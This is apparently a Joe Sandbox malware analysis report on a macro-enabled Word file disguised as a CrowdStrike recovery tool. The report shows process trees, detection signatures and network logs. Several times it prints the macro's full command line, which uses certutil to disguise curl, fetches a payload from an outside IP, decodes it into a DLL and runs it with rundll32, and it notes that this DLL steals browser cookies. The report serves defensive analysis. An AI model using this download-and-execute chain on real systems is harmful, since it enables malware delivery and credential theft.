Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Overview

General Information

Sample name:New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Analysis ID:1478411
MD5:dd2100dfa067caae416b885637adc4ef
SHA1:499f8881f4927e7b4a1a0448f62c60741ea6d44b
SHA256:803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
Tags:docm
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Contains functionality to steal Chrome passwords or cookies
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Downloads suspicious files via Chrome
Machine Learning detection for dropped file
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: Legitimate Application Dropped Executable
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 2156 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • cmd.exe (PID: 3916 cmdline: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • xcopy.exe (PID: 5308 cmdline: xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp MD5: 7E9B7CE496D09F70C072930940F9F02C)
      • certutil.exe (PID: 2496 cmdline: certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • certutil.exe (PID: 3552 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • curl.exe (PID: 2784 cmdline: C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • certutil.exe (PID: 2496 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • rundll32.exe (PID: 5068 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 3992 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: EF3179D498793BF4234F708D3BE28633)
          • cmd.exe (PID: 5640 cmdline: C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 2144 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • chrome.exe (PID: 7612 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 7792 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 2716 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • WINWORD.EXE (PID: 3856 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • cmd.exe (PID: 6464 cmdline: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • xcopy.exe (PID: 7500 cmdline: xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp MD5: 7E9B7CE496D09F70C072930940F9F02C)
      • certutil.exe (PID: 7576 cmdline: certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • certutil.exe (PID: 4820 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • curl.exe (PID: 8092 cmdline: C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • certutil.exe (PID: 8116 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • rundll32.exe (PID: 5208 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 5940 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: EF3179D498793BF4234F708D3BE28633)
          • cmd.exe (PID: 2540 cmdline: C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 5680 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\certutil.exe, ProcessId: 3552, TargetFilename: C:\Users\user\AppData\Local\Temp\curl.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 2156, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe &
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 2156, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe &
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 2156, TargetFilename: C:\Users\user\Desktop\~$w_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
No Snort rule has matched
Timestamp:2024-07-22T15:58:45.771195+0200
SID:2029280
Source Port:8099
Destination Port:49195
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-07-22T15:57:48.044440+0200
SID:2029280
Source Port:8099
Destination Port:49717
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRC0000.tmpJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008AF02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,13_2_008AF02B
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008AF820 CryptAcquireContextA,CryptCreateHash,13_2_008AF820
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008AF860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,13_2_008AF860
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008A6400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,13_2_008A6400
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008AEC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,13_2_008AEC10
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008A6591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,13_2_008A6591
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008A3EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free,13_2_008A3EA4
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008AC6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,13_2_008AC6E0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008AC730 CryptHashData,13_2_008AC730
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008AC750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,13_2_008AC750
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C15E30 BCryptGenRandom,16_2_00007FFD92C15E30
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF2210 new,CryptStringToBinaryA,delete,delete,delete,CryptStringToBinaryA,CryptUnprotectData,new,delete,delete,delete,16_2_00007FFD92BF2210
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF2E60 new,new,new,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptCloseAlgorithmProvider,BCryptGenerateSymmetricKey,BCryptDecrypt,BCryptDecrypt,BCryptCloseAlgorithmProvider,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,16_2_00007FFD92BF2E60
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C39500 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,16_2_00007FFD92C39500
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C15B90 BCryptGenRandom,16_2_00007FFD92C15B90
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C65EE0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,16_2_00007FFD92C65EE0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C65E90 CryptAcquireContextA,CryptCreateHash,16_2_00007FFD92C65E90
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C65F70 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,16_2_00007FFD92C65F70
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C5E0B0 CertOpenStore,GetLastError,CertCreateCertificateChainuser,GetLastError,CertGetCertificateChain,GetLastError,CertFreeCertificateChainuser,CertCloseStore,CertFreeCertificateChain,CertFreeCertificateContext,CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,_heap_alloc,16_2_00007FFD92C5E0B0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C64530 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,16_2_00007FFD92C64530
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C645B0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,16_2_00007FFD92C645B0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C645A0 CryptHashData,16_2_00007FFD92C645A0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C64B30 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,16_2_00007FFD92C64B30
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C5E990 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,16_2_00007FFD92C5E990
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C66EC0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,16_2_00007FFD92C66EC0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087F820 CryptAcquireContextA,CryptCreateHash,33_2_0087F820
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,33_2_0087F02B
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,33_2_0087F860
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_00876400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,33_2_00876400
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,33_2_0087EC10
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_00876591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,33_2_00876591
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_00873EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free,33_2_00873EA4
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,33_2_0087C6E0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087C730 CryptHashData,33_2_0087C730
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,33_2_0087C750
Source: certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_eb710474-e
Source: C:\Windows\System32\rundll32.exeCode function: mov dword ptr [rbp+04h], 424D53FFh16_2_00007FFD92C4D7E0
Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49772 version: TLS 1.0
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49213 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49233 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49268 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49325 version: TLS 1.2
Source: Binary string: curl.pdb source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: D:\c++\Mal_Cookie_x64\x64\Release\mscorsvc.pdb source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C0B230 